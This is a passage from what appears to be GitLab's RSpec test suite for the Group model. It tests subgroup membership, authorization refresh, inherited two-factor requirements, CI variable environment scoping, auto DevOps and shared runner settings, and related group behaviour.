let(:nested_group) { create(:group, parent: group) }
let(:deep_nested_group) { create(:group, parent: nested_group) }
let(:project_a) { create(:project, namespace: group) }
let(:project_b) { create(:project, namespace: nested_group) }
let(:project_c) { create(:project, namespace: deep_nested_group) }
it 'returns members of all projects in group and subgroups' do
project_a.add_developer(user_a)
project_b.add_developer(user_b)
project_c.add_developer(user_c)
expect(group.project_users_with_descendants).to contain_exactly(user_a, user_b, user_c)
expect(nested_group.project_users_with_descendants).to contain_exactly(user_b, user_c)
expect(deep_nested_group.project_users_with_descendants).to contain_exactly(user_c)
end
end
describe '#refresh_members_authorized_projects' do
let_it_be(:group) { create(:group, :nested) }
let_it_be(:parent_group_user) { create(:user) }
let_it_be(:group_user) { create(:user) }
before do
group.parent.add_maintainer(parent_group_user)
group.add_developer(group_user)
end
context 'users for which authorizations refresh is executed' do
it 'processes authorizations refresh for all members of the group' do
expect(UserProjectAccessChangedService).to receive(:new).with(contain_exactly(group_user.id, parent_group_user.id)).and_call_original
group.refresh_members_authorized_projects
end
context 'when explicitly specified to run only for direct members' do
it 'processes authorizations refresh only for direct members of the group' do
expect(UserProjectAccessChangedService).to receive(:new).with(contain_exactly(group_user.id)).and_call_original
group.refresh_members_authorized_projects(direct_members_only: true)
end
end
end
end
describe '#users_ids_of_direct_members' do
let_it_be(:group) { create(:group, :nested) }
let_it_be(:parent_group_user) { create(:user) }
let_it_be(:group_user) { create(:user) }
before do
group.parent.add_maintainer(parent_group_user)
group.add_developer(group_user)
end
it 'does not return user ids of the members of the parent' do
expect(group.users_ids_of_direct_members).not_to include(parent_group_user.id)
end
it 'returns the user ids of the direct member of the group' do
expect(group.users_ids_of_direct_members).to include(group_user.id)
end
context 'group sharing' do
let!(:shared_group) { create(:group) }
before do
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'does not return the user ids of members of the shared_with group' do
expect(shared_group.users_ids_of_direct_members).not_to(
include(group_user.id))
end
end
end
describe '#user_ids_for_project_authorizations' do
it 'returns the user IDs for which to refresh authorizations' do
maintainer = create(:user)
developer = create(:user)
group.add_user(maintainer, GroupMember::MAINTAINER)
group.add_user(developer, GroupMember::DEVELOPER)
expect(group.user_ids_for_project_authorizations)
.to include(maintainer.id, developer.id)
end
context 'group sharing' do
let_it_be(:group) { create(:group) }
let_it_be(:group_user) { create(:user) }
let_it_be(:shared_group) { create(:group) }
before do
group.add_developer(group_user)
create(:group_group_link, shared_group: shared_group, shared_with_group: group)
end
it 'returns the user IDs for shared with group members' do
expect(shared_group.user_ids_for_project_authorizations).to(
include(group_user.id))
end
end
context 'distinct user ids' do
let_it_be(:subgroup) { create(:group, :nested) }
let_it_be(:user) { create(:user) }
let_it_be(:shared_with_group) { create(:group) }
let_it_be(:other_subgroup_user) { create(:user) }
before do
create(:group_group_link, shared_group: subgroup, shared_with_group: shared_with_group)
subgroup.add_maintainer(other_subgroup_user)
# `user` is added as a direct member of the parent group, the subgroup
# and another group shared with the subgroup.
subgroup.parent.add_maintainer(user)
subgroup.add_developer(user)
shared_with_group.add_guest(user)
end
it 'returns only distinct user ids of users for which to refresh authorizations' do
expect(subgroup.user_ids_for_project_authorizations).to(
contain_exactly(user.id, other_subgroup_user.id))
end
end
end
describe '#update_two_factor_requirement' do
let(:user) { create(:user) }
context 'group membership' do
before do
group.add_user(user, GroupMember::OWNER)
end
it 'is called when require_two_factor_authentication is changed' do
expect_any_instance_of(User).to receive(:update_two_factor_requirement)
group.update!(require_two_factor_authentication: true)
end
it 'is called when two_factor_grace_period is changed' do
expect_any_instance_of(User).to receive(:update_two_factor_requirement)
group.update!(two_factor_grace_period: 23)
end
it 'is not called when other attributes are changed' do
expect_any_instance_of(User).not_to receive(:update_two_factor_requirement)
group.update!(description: 'foobar')
end
it 'calls #update_two_factor_requirement on each group member' do
other_user = create(:user)
group.add_user(other_user, GroupMember::OWNER)
calls = 0
allow_any_instance_of(User).to receive(:update_two_factor_requirement) do
calls += 1
end
group.update!(require_two_factor_authentication: true, two_factor_grace_period: 23)
expect(calls).to eq 2
end
end
context 'sub groups and projects' do
it 'enables two_factor_requirement for group member' do
group.add_user(user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: true)
expect(user.reload.require_two_factor_authentication_from_group).to be_truthy
end
context 'expanded group members' do
let(:indirect_user) { create(:user) }
context 'two_factor_requirement is enabled' do
context 'two_factor_requirement is also enabled for ancestor group' do
it 'enables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: true)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
end
context 'two_factor_requirement is disabled for ancestor group' do
it 'enables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group, require_two_factor_authentication: true)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: false)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
it 'enable two_factor_requirement for ancestor group member' do
ancestor_group = create(:group)
ancestor_group.add_user(indirect_user, GroupMember::OWNER)
group.update!(parent: ancestor_group)
group.update!(require_two_factor_authentication: true)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
end
end
context 'two_factor_requirement is disabled' do
context 'two_factor_requirement is enabled for ancestor group' do
it 'enables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: true)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_truthy
end
end
context 'two_factor_requirement is also disabled for ancestor group' do
it 'disables two_factor_requirement for subgroup member' do
subgroup = create(:group, :nested, parent: group)
subgroup.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: false)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_falsey
end
it 'disables two_factor_requirement for ancestor group member' do
ancestor_group = create(:group, require_two_factor_authentication: false)
indirect_user.update!(require_two_factor_authentication_from_group: true)
ancestor_group.add_user(indirect_user, GroupMember::OWNER)
group.update!(require_two_factor_authentication: false)
expect(indirect_user.reload.require_two_factor_authentication_from_group).to be_falsey
end
end
end
end
context 'project members' do
it 'does not enable two_factor_requirement for child project member' do
project = create(:project, group: group)
project.add_maintainer(user)
group.update!(require_two_factor_authentication: true)
expect(user.reload.require_two_factor_authentication_from_group).to be_falsey
end
it 'does not enable two_factor_requirement for subgroup child project member' do
subgroup = create(:group, :nested, parent: group)
project = create(:project, group: subgroup)
project.add_maintainer(user)
group.update!(require_two_factor_authentication: true)
expect(user.reload.require_two_factor_authentication_from_group).to be_falsey
end
end
end
end
describe '#path_changed_hook' do
let(:system_hook_service) { SystemHooksService.new }
context 'for a new group' do
let(:group) { build(:group) }
before do
expect(group).to receive(:system_hook_service).and_return(system_hook_service)
end
it 'does not trigger system hook' do
expect(system_hook_service).to receive(:execute_hooks_for).with(group, :create)
group.save!
end
end
context 'for an existing group' do
let(:group) { create(:group, path: 'old-path') }
context 'when the path is changed' do
let(:new_path) { 'very-new-path' }
it 'triggers the rename system hook' do
expect(group).to receive(:system_hook_service).and_return(system_hook_service)
expect(system_hook_service).to receive(:execute_hooks_for).with(group, :rename)
group.update!(path: new_path)
end
end
context 'when the path is not changed' do
it 'does not trigger system hook' do
expect(group).not_to receive(:system_hook_service)
group.update!(name: 'new name')
end
end
end
end
describe '#ci_variables_for' do
let(:project) { create(:project, group: group) }
let(:environment_scope) { '*' }
let!(:ci_variable) do
create(:ci_group_variable, value: 'secret', group: group, environment_scope: environment_scope)
end
let!(:protected_variable) do
create(:ci_group_variable, :protected, value: 'protected', group: group)
end
subject { group.ci_variables_for('ref', project) }
it 'memoizes the result by ref and environment', :request_store do
scoped_variable = create(:ci_group_variable, value: 'secret', group: group, environment_scope: 'scoped')
expect(project).to receive(:protected_for?).with('ref').once.and_return(true)
expect(project).to receive(:protected_for?).with('other').twice.and_return(false)
2.times do
expect(group.ci_variables_for('ref', project, environment: 'production')).to contain_exactly(ci_variable, protected_variable)
expect(group.ci_variables_for('other', project)).to contain_exactly(ci_variable)
expect(group.ci_variables_for('other', project, environment: 'scoped')).to contain_exactly(ci_variable, scoped_variable)
end
end
shared_examples 'ref is protected' do
it 'contains all the variables' do
is_expected.to contain_exactly(ci_variable, protected_variable)
end
end
context 'when the ref is not protected' do
before do
stub_application_setting(
default_branch_protection: Gitlab::Access::PROTECTION_NONE)
end
it 'contains only the CI variables' do
is_expected.to contain_exactly(ci_variable)
end
end
context 'when the ref is a protected branch' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
context 'when the ref is a protected tag' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
context 'when environment name is specified' do
let(:environment) { 'review/name' }
subject do
group.ci_variables_for('ref', project, environment: environment)
end
context 'when environment scope is exactly matched' do
let(:environment_scope) { 'review/name' }
it { is_expected.to contain_exactly(ci_variable) }
end
context 'when environment scope is matched by wildcard' do
let(:environment_scope) { 'review/*' }
it { is_expected.to contain_exactly(ci_variable) }
end
context 'when environment scope does not match' do
let(:environment_scope) { 'review/*/special' }
it { is_expected.not_to contain_exactly(ci_variable) }
end
context 'when environment scope has _' do
let(:environment_scope) { '*_*' }
it 'does not treat it as wildcard' do
is_expected.not_to contain_exactly(ci_variable)
end
context 'when environment name contains underscore' do
let(:environment) { 'foo_bar/test' }
let(:environment_scope) { 'foo_bar/*' }
it 'matches literally for _' do
is_expected.to contain_exactly(ci_variable)
end
end
end
# The environment name and scope cannot have % at the moment,
# but we're considering relaxing it and we should also make sure
# it doesn't break in case some data sneaked in somehow as we're
# not checking this integrity in database level.
context 'when environment scope has %' do
it 'does not treat it as wildcard' do
ci_variable.update_attribute(:environment_scope, '*%*')
is_expected.not_to contain_exactly(ci_variable)
end
context 'when environment name contains a percent' do
let(:environment) { 'foo%bar/test' }
it 'matches literally for %' do
ci_variable.update(environment_scope: 'foo%bar/*')
is_expected.to contain_exactly(ci_variable)
end
end
end
context 'when variables with the same name have different environment scopes' do
let!(:partially_matched_variable) do
create(:ci_group_variable,
key: ci_variable.key,
value: 'partial',
environment_scope: 'review/*',
group: group)
end
let!(:perfectly_matched_variable) do
create(:ci_group_variable,
key: ci_variable.key,
value: 'prefect',
environment_scope: 'review/name',
group: group)
end
it 'puts variables matching environment scope more in the end' do
is_expected.to eq(
[ci_variable,
partially_matched_variable,
perfectly_matched_variable])
end
end
end
context 'when group has children' do
let(:group_child) { create(:group, parent: group) }
let(:group_child_2) { create(:group, parent: group_child) }
let(:group_child_3) { create(:group, parent: group_child_2) }
let(:variable_child) { create(:ci_group_variable, group: group_child) }
let(:variable_child_2) { create(:ci_group_variable, group: group_child_2) }
let(:variable_child_3) { create(:ci_group_variable, group: group_child_3) }
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
context 'traversal queries' do
shared_examples 'correct ancestor order' do
it 'returns all variables belong to the group and parent groups' do
expected_array1 = [protected_variable, ci_variable]
expected_array2 = [variable_child, variable_child_2, variable_child_3]
got_array = group_child_3.ci_variables_for('ref', project).to_a
expect(got_array.shift(2)).to contain_exactly(*expected_array1)
expect(got_array).to eq(expected_array2)
end
end
context 'recursive' do
before do
stub_feature_flags(use_traversal_ids: false)
end
include_examples 'correct ancestor order'
end
context 'linear' do
before do
stub_feature_flags(use_traversal_ids: true)
group_child_3.reload # make sure traversal_ids are reloaded
end
include_examples 'correct ancestor order'
end
end
end
end
describe '#highest_group_member' do
let(:nested_group) { create(:group, parent: group) }
let(:nested_group_2) { create(:group, parent: nested_group) }
let(:user) { create(:user) }
subject(:highest_group_member) { nested_group_2.highest_group_member(user) }
context 'when the user is not a member of any group in the hierarchy' do
it 'returns nil' do
expect(highest_group_member).to be_nil
end
end
context 'when the user is only a member of one group in the hierarchy' do
before do
nested_group.add_developer(user)
end
it 'returns that group member' do
expect(highest_group_member.access_level).to eq(Gitlab::Access::DEVELOPER)
end
end
context 'when the user is a member of several groups in the hierarchy' do
before do
group.add_owner(user)
nested_group.add_developer(user)
nested_group_2.add_maintainer(user)
end
it 'returns the group member with the highest access level' do
expect(highest_group_member.access_level).to eq(Gitlab::Access::OWNER)
end
end
end
describe '#related_group_ids' do
let(:nested_group) { create(:group, parent: group) }
let(:shared_with_group) { create(:group, parent: group) }
before do
create(:group_group_link, shared_group: nested_group,
shared_with_group: shared_with_group)
end
subject(:related_group_ids) { nested_group.related_group_ids }
it 'returns id' do
expect(related_group_ids).to include(nested_group.id)
end
it 'returns ancestor id' do
expect(related_group_ids).to include(group.id)
end
it 'returns shared with group id' do
expect(related_group_ids).to include(shared_with_group.id)
end
context 'with more than one ancestor group' do
let(:ancestor_group) { create(:group) }
before do
group.update(parent: ancestor_group)
end
it 'returns all ancestor group ids' do
expect(related_group_ids).to(
include(group.id, ancestor_group.id))
end
end
context 'with more than one shared with group' do
let(:another_shared_with_group) { create(:group, parent: group) }
before do
create(:group_group_link, shared_group: nested_group,
shared_with_group: another_shared_with_group)
end
it 'returns all shared with group ids' do
expect(related_group_ids).to(
include(shared_with_group.id, another_shared_with_group.id))
end
end
end
context 'with uploads' do
it_behaves_like 'model with uploads', true do
let(:model_object) { create(:group, :with_avatar) }
let(:upload_attribute) { :avatar }
let(:uploader_class) { AttachmentUploader }
end
end
describe '#first_auto_devops_config' do
using RSpec::Parameterized::TableSyntax
let(:group) { create(:group) }
subject { group.first_auto_devops_config }
where(:instance_value, :group_value, :config) do
# Instance level enabled
true | nil | { status: true, scope: :instance }
true | true | { status: true, scope: :group }
true | false | { status: false, scope: :group }
# Instance level disabled
false | nil | { status: false, scope: :instance }
false | true | { status: true, scope: :group }
false | false | { status: false, scope: :group }
end
with_them do
before do
stub_application_setting(auto_devops_enabled: instance_value)
group.update_attribute(:auto_devops_enabled, group_value)
end
it { is_expected.to eq(config) }
end
context 'with parent groups' do
where(:instance_value, :parent_value, :group_value, :config) do
# Instance level enabled
true | nil | nil | { status: true, scope: :instance }
true | nil | true | { status: true, scope: :group }
true | nil | false | { status: false, scope: :group }
true | true | nil | { status: true, scope: :group }
true | true | true | { status: true, scope: :group }
true | true | false | { status: false, scope: :group }
true | false | nil | { status: false, scope: :group }
true | false | true | { status: true, scope: :group }
true | false | false | { status: false, scope: :group }
# Instance level disable
false | nil | nil | { status: false, scope: :instance }
false | nil | true | { status: true, scope: :group }
false | nil | false | { status: false, scope: :group }
false | true | nil | { status: true, scope: :group }
false | true | true | { status: true, scope: :group }
false | true | false | { status: false, scope: :group }
false | false | nil | { status: false, scope: :group }
false | false | true | { status: true, scope: :group }
false | false | false | { status: false, scope: :group }
end
with_them do
before do
stub_application_setting(auto_devops_enabled: instance_value)
parent = create(:group, auto_devops_enabled: parent_value)
group.update!(
auto_devops_enabled: group_value,
parent: parent
)
end
it { is_expected.to eq(config) }
end
end
end
describe '#auto_devops_enabled?' do
subject { group.auto_devops_enabled? }
context 'when auto devops is explicitly enabled on group' do
let(:group) { create(:group, :auto_devops_enabled) }
it { is_expected.to be_truthy }
end
context 'when auto devops is explicitly disabled on group' do
let(:group) { create(:group, :auto_devops_disabled) }
it { is_expected.to be_falsy }
end
context 'when auto devops is implicitly enabled or disabled' do
before do
stub_application_setting(auto_devops_enabled: false)
group.update!(parent: parent_group)
end
context 'when auto devops is enabled on root group' do
let(:root_group) { create(:group, :auto_devops_enabled) }
let(:subgroup) { create(:group, parent: root_group) }
let(:parent_group) { create(:group, parent: subgroup) }
it { is_expected.to be_truthy }
end
context 'when auto devops is disabled on root group' do
let(:root_group) { create(:group, :auto_devops_disabled) }
let(:subgroup) { create(:group, parent: root_group) }
let(:parent_group) { create(:group, parent: subgroup) }
it { is_expected.to be_falsy }
end
context 'when auto devops is disabled on parent group and enabled on root group' do
let(:root_group) { create(:group, :auto_devops_enabled) }
let(:parent_group) { create(:group, :auto_devops_disabled, parent: root_group) }
it { is_expected.to be_falsy }
end
end
end
describe 'project_creation_level' do
it 'outputs the default one if it is nil' do
group = create(:group, project_creation_level: nil)
expect(group.project_creation_level).to eq(Gitlab::CurrentSettings.default_project_creation)
end
end
describe 'subgroup_creation_level' do
it 'defaults to maintainers' do
expect(group.subgroup_creation_level)
.to eq(Gitlab::Access::MAINTAINER_SUBGROUP_ACCESS)
end
end
describe '#access_request_approvers_to_be_notified' do
let_it_be(:group) { create(:group, :public) }
it 'returns a maximum of ten owners of the group in recent_sign_in descending order' do
limit = 2
stub_const("Member::ACCESS_REQUEST_APPROVERS_TO_BE_NOTIFIED_LIMIT", limit)
users = create_list(:user, limit + 1, :with_sign_ins)
active_owners = users.map do |user|
create(:group_member, :owner, group: group, user: user)
end
active_owners_in_recent_sign_in_desc_order = group.members_and_requesters
.id_in(active_owners)
.order_recent_sign_in.limit(limit)
expect(group.access_request_approvers_to_be_notified).to eq(active_owners_in_recent_sign_in_desc_order)
end
it 'returns active, non_invited, non_requested owners of the group' do
owner = create(:group_member, :owner, source: group)
create(:group_member, :maintainer, group: group)
create(:group_member, :owner, :invited, group: group)
create(:group_member, :owner, :access_request, group: group)
create(:group_member, :owner, :blocked, group: group)
expect(group.access_request_approvers_to_be_notified.to_a).to eq([owner])
end
end
describe '.groups_including_descendants_by' do
let_it_be(:parent_group1) { create(:group) }
let_it_be(:parent_group2) { create(:group) }
let_it_be(:extra_group) { create(:group) }
let_it_be(:child_group1) { create(:group, parent: parent_group1) }
let_it_be(:child_group2) { create(:group, parent: parent_group1) }
let_it_be(:child_group3) { create(:group, parent: parent_group2) }
subject { described_class.groups_including_descendants_by([parent_group2.id, parent_group1.id]) }
shared_examples 'returns the expected groups for a group and its descendants' do
specify { is_expected.to contain_exactly(parent_group1, parent_group2, child_group1, child_group2, child_group3) }
end
it_behaves_like 'returns the expected groups for a group and its descendants'
context 'when :linear_group_including_descendants_by feature flag is disabled' do
before do
stub_feature_flags(linear_group_including_descendants_by: false)
end
it_behaves_like 'returns the expected groups for a group and its descendants'
end
end
describe '.preset_root_ancestor_for' do
let_it_be(:rootgroup, reload: true) { create(:group) }
let_it_be(:subgroup, reload: true) { create(:group, parent: rootgroup) }
let_it_be(:subgroup2, reload: true) { create(:group, parent: subgroup) }
it 'does noting for single group' do
expect(subgroup).not_to receive(:self_and_ancestors)
described_class.preset_root_ancestor_for([subgroup])
end
it 'sets the same root_ancestor for multiple groups' do
expect(subgroup).not_to receive(:self_and_ancestors)
expect(subgroup2).not_to receive(:self_and_ancestors)
described_class.preset_root_ancestor_for([rootgroup, subgroup, subgroup2])
expect(subgroup.root_ancestor).to eq(rootgroup)
expect(subgroup2.root_ancestor).to eq(rootgroup)
end
end
describe '#update_shared_runners_setting!' do
context 'enabled' do
subject { group.update_shared_runners_setting!('enabled') }
context 'group that its ancestors have shared runners disabled' do
let_it_be(:parent, reload: true) { create(:group, :shared_runners_disabled) }
let_it_be(:group, reload: true) { create(:group, :shared_runners_disabled, parent: parent) }
let_it_be(:project, reload: true) { create(:project, shared_runners_enabled: false, group: group) }
it 'raises exception' do
expect { subject }
.to raise_error(ActiveRecord::RecordInvalid, 'Validation failed: Shared runners enabled cannot be enabled because parent group has shared Runners disabled')
end
it 'does not enable shared runners' do
expect do
subject rescue nil
parent.reload
group.reload
project.reload
end.to not_change { parent.shared_runners_enabled }
.and not_change { group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
context 'root group with shared runners disabled' do
let_it_be(:group) { create(:group, :shared_runners_disabled) }
let_it_be(:sub_group) { create(:group, :shared_runners_disabled, parent: group) }
let_it_be(:project) { create(:project, shared_runners_enabled: false, group: sub_group) }
it 'enables shared Runners only for itself' do
expect { subject_and_reload(group, sub_group, project) }
.to change { group.shared_runners_enabled }.from(false).to(true)
.and not_change { sub_group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
end
context 'disabled_and_unoverridable' do
let_it_be(:group) { create(:group) }
let_it_be(:sub_group) { create(:group, :shared_runners_disabled, :allow_descendants_override_disabled_shared_runners, parent: group) }
let_it_be(:sub_group_2) { create(:group, parent: group) }
let_it_be(:project) { create(:project, group: group, shared_runners_enabled: true) }
let_it_be(:project_2) { create(:project, group: sub_group_2, shared_runners_enabled: true) }
subject { group.update_shared_runners_setting!('disabled_and_unoverridable') }
it 'disables shared Runners for all descendant groups and projects' do
expect { subject_and_reload(group, sub_group, sub_group_2, project, project_2) }
.to change { group.shared_runners_enabled }.from(true).to(false)
.and not_change { group.allow_descendants_override_disabled_shared_runners }
.and not_change { sub_group.shared_runners_enabled }
.and change { sub_group.allow_descendants_override_disabled_shared_runners }.from(true).to(false)
.and change { sub_group_2.shared_runners_enabled }.from(true).to(false)
.and not_change { sub_group_2.allow_descendants_override_disabled_shared_runners }
.and change { project.shared_runners_enabled }.from(true).to(false)
.and change { project_2.shared_runners_enabled }.from(true).to(false)
end
context 'with override on self' do
let_it_be(:group) { create(:group, :shared_runners_disabled, :allow_descendants_override_disabled_shared_runners) }
it 'disables it' do
expect { subject_and_reload(group) }
.to not_change { group.shared_runners_enabled }
.and change { group.allow_descendants_override_disabled_shared_runners }.from(true).to(false)
end
end
end
context 'disabled_with_override' do
subject { group.update_shared_runners_setting!('disabled_with_override') }
context 'top level group' do
let_it_be(:group) { create(:group, :shared_runners_disabled) }
let_it_be(:sub_group) { create(:group, :shared_runners_disabled, parent: group) }
let_it_be(:project) { create(:project, shared_runners_enabled: false, group: sub_group) }
it 'enables allow descendants to override only for itself' do
expect { subject_and_reload(group, sub_group, project) }
.to change { group.allow_descendants_override_disabled_shared_runners }.from(false).to(true)
.and not_change { group.shared_runners_enabled }
.and not_change { sub_group.allow_descendants_override_disabled_shared_runners }
.and not_change { sub_group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
context 'group that its ancestors have shared Runners disabled but allows to override' do
let_it_be(:parent) { create(:group, :shared_runners_disabled, :allow_descendants_override_disabled_shared_runners) }
let_it_be(:group) { create(:group, :shared_runners_disabled, parent: parent) }
let_it_be(:project) { create(:project, shared_runners_enabled: false, group: group) }
it 'enables allow descendants to override' do
expect { subject_and_reload(parent, group, project) }
.to not_change { parent.allow_descendants_override_disabled_shared_runners }
.and not_change { parent.shared_runners_enabled }
.and change { group.allow_descendants_override_disabled_shared_runners }.from(false).to(true)
.and not_change { group.shared_runners_enabled }
.and not_change { project.shared_runners_enabled }
end
end
context 'when parent does not allow' do
let_it_be(:parent, reload: true) { create(:group, :shared_runners_disabled, allow_descendants_override_disabled_shared_runners: false ) }
let_it_be(:group, reload: true) { create(:group, :shared_runners_disabled, allow_descendants_override_disabled_shared_runners: false, parent: parent) }
it 'raises exception' do
expect { subject }
.to raise_error(ActiveRecord::RecordInvalid, 'Validation failed: Allow descendants override disabled shared runners cannot be enabled because parent group does not allow it')
end
it 'does not allow descendants to override' do
expect do
subject rescue nil
parent.reload
group.reload
end.to not_change { parent.allow_descendants_override_disabled_shared_runners }
.and not_change { parent.shared_runners_enabled }
.and not_change { group.allow_descendants_override_disabled_shared_runners }
.and not_change { group.shared_runners_enabled }
end
end
context 'top level group that has shared Runners enabled' do
let_it_be(:group) { create(:group, shared_runners_enabled: true) }
let_it_be(:sub_group) { create(:group, shared_runners_enabled: true, parent: group) }
let_it_be(:project) { create(:project, shared_runners_enabled: true, group: sub_group) }
it 'enables allow descendants to override & disables shared runners everywhere' do
expect { subject_and_reload(group, sub_group, project) }
.to change { group.shared_runners_enabled }.from(true).to(false)
.and change { group.allow_descendants_override_disabled_shared_runners }.from(false).to(true)
.and change { sub_group.shared_runners_enabled }.from(true).to(false)
.and change { project.shared_runners_enabled }.from(true).to(false)
end
end
end
end
describe "#default_branch_name" do
context "when group.namespace_settings does not have a default branch name" do
it "returns nil" do
expect(group.default_branch_name).to be_nil
end
end
context "when group.namespace_settings has a default branch name" do
let(:example_branch_name) { "example_branch_name" }
before do
allow(group.namespace_settings)
.to receive(:default_branch_name)
.and_return(example_branch_name)
end
it "returns the default branch name" do
expect(group.default_branch_name).to eq(example_branch_name)
end
end
end
describe '#membership_locked?' do
it 'returns false' do
expect(build(:group)).not_to be_membership_locked
end
end
describe '#default_owner' do
let(:group) { build(:group) }
context 'the group has owners' do
before do
group.add_owner(create(:user))
group.add_owner(create(:user))
end
it 'is the first owner' do
expect(group.default_owner)
.to eq(group.owners.first)
.and be_a(User)
end
end
context 'the group has a parent' do
let(:parent) { build(:group) }
before do
group.parent = parent
parent.add_owner(create(:user))
end
it 'is the first owner of the parent' do
expect(group.default_owner)
.to eq(parent.default_owner)
.and be_a(User)
end
end
context 'we fallback to group.owner' do
before do
group.owner = build(:user)
end
it 'is the group.owner' do
expect(group.default_owner)
.to eq(group.owner)
.and be_a(User)
end
end
end
describe '#parent_allows_two_factor_authentication?' do
it 'returns true for top-level group' do
expect(group.parent_allows_two_factor_authentication?).to eq(true)
end
context 'for subgroup' do
let(:subgroup) { create(:group, parent: group) }
it 'returns true if parent group allows two factor authentication for its descendants' do
expect(subgroup.parent_allows_two_factor_authentication?).to eq(true)
end
it 'returns true if parent group allows two factor authentication for its descendants' do
group.namespace_settings.update!(allow_mfa_for_subgroups: false)
expect(subgroup.parent_allows_two_factor_authentication?).to eq(false)
end
end
end
describe 'has_project_with_service_desk_enabled?' do
let_it_be(:group) { create(:group, :private) }
subject { group.has_project_with_service_desk_enabled? }
before do
allow(Gitlab::ServiceDesk).to receive(:supported?).and_return(true)
end
context 'when service desk is enabled' do
context 'for top level group' do
let_it_be(:project) { create(:project, group: group, service_desk_enabled: true) }
it { is_expected.to eq(true) }
context 'when service desk is not supported' do
before do
allow(Gitlab::ServiceDesk).to receive(:supported?).and_return(false)
end
it { is_expected.to eq(false) }
end
end
context 'for subgroup project' do
let_it_be(:subgroup) { create(:group, :private, parent: group)}
let_it_be(:project) { create(:project, group: subgroup, service_desk_enabled: true) }
it { is_expected.to eq(true) }
end
end
context 'when none of group child projects has service desk enabled' do
let_it_be(:project) { create(:project, group: group, service_desk_enabled: false) }
before do
project.update(service_desk_enabled: false)
end
it { is_expected.to eq(false) }
end
end
describe 'with Debian Distributions' do
subject { create(:group) }
it_behaves_like 'model with Debian distributions'
end
describe '.ids_with_disabled_email' do
let!(:parent_1) { create(:group, emails_disabled: true) }
let!(:child_1) { create(:group, parent: parent_1) }
let!(:parent_2) { create(:group, emails_disabled: false) }
let!(:child_2) { create(:group, parent: parent_2) }
let!(:other_group) { create(:group, emails_disabled: false) }
subject(:group_ids_where_email_is_disabled) { described_class.ids_with_disabled_email([child_1, child_2, other_group]) }
it { is_expected.to eq(Set.new([child_1.id])) }
end
describe '.timelogs' do
let(:project) { create(:project, namespace: group) }
let(:issue) { create(:issue, project: project) }
let(:other_project) { create(:project, namespace: create(:group)) }
let(:other_issue) { create(:issue, project: other_project) }
let!(:timelog1) { create(:timelog, issue: issue) }
let!(:timelog2) { create(:timelog, issue: other_issue) }
let!(:timelog3) { create(:timelog, issue: issue) }
it 'returns timelogs belonging to the group' do
expect(group.timelogs).to contain_exactly(timelog1, timelog3)
end
end
describe '.organizations' do
it 'returns organizations belonging to the group' do
organization1 = create(:organization, group: group)
create(:organization)
organization3 = create(:organization, group: group)
expect(group.organizations).to contain_exactly(organization1, organization3)
end
end
describe '.contacts' do
it 'returns contacts belonging to the group' do
contact1 = create(:contact, group: group)
create(:contact)
contact3 = create(:contact, group: group)
expect(group.contacts).to contain_exactly(contact1, contact3)
end
end
describe '#to_ability_name' do
it 'returns group' do
group = build(:group)
expect(group.to_ability_name).to eq('group')
end
end
describe '#activity_path' do
it 'returns the group activity_path' do
expected_path = "/groups/#{group.name}/-/activity"
expect(group.activity_path).to eq(expected_path)
end
end
context 'with export' do
let(:group) { create(:group, :with_export) }
it '#export_file_exists? returns true' do
expect(group.export_file_exists?).to be true
end
it '#export_archive_exists? returns true' do
expect(group.export_archive_exists?).to be true
end
end
describe '#open_issues_count', :aggregate_failures do
let(:group) { build(:group) }
it 'provides the issue count' do
expect(group.open_issues_count).to eq 0
end
it 'invokes the count service with current_user' do
user = build(:user)
count_service = instance_double(Groups::OpenIssuesCountService)
expect(Groups::OpenIssuesCountService).to receive(:new).with(group, user).and_return(count_service)
expect(count_service).to receive(:count)
group.open_issues_count(user)
end
it 'invokes the count service with no current_user' do
count_service = instance_double(Groups::OpenIssuesCountService)
expect(Groups::OpenIssuesCountService).to receive(:new).with(group, nil).and_return(count_service)
expect(count_service).to receive(:count)
group.open_issues_count
end
end
describe '#open_merge_requests_count', :aggregate_failures do
let(:group) { build(:group) }
it 'provides the merge request count' do
expect(group.open_merge_requests_count).to eq 0
end
it 'invokes the count service with current_user' do
user = build(:user)
count_service = instance_double(Groups::MergeRequestsCountService)
expect(Groups::MergeRequestsCountService).to receive(:new).with(group, user).and_return(count_service)
expect(count_service).to receive(:count)
group.open_merge_requests_count(user)
end
it 'invokes the count service with no current_user' do
count_service = instance_double(Groups::MergeRequestsCountService)
expect(Groups::MergeRequestsCountService).to receive(:new).with(group, nil).and_return(count_service)
expect(count_service).to receive(:count)
group.open_merge_requests_count
end
end
describe '#dependency_proxy_image_prefix' do
let_it_be(:group) { build_stubbed(:group, path: 'GroupWithUPPERcaseLetters') }
it 'converts uppercase letters to lowercase' do
expect(group.dependency_proxy_image_prefix).to end_with("/groupwithuppercaseletters#{DependencyProxy::URL_SUFFIX}")
end
it 'removes the protocol' do
expect(group.dependency_proxy_image_prefix).not_to include('http')
end
end
describe '#dependency_proxy_image_ttl_policy' do
subject(:ttl_policy) { group.dependency_proxy_image_ttl_policy }
it 'builds a new policy if one does not exist', :aggregate_failures do
expect(ttl_policy.ttl).to eq(90)
expect(ttl_policy.enabled).to eq(false)
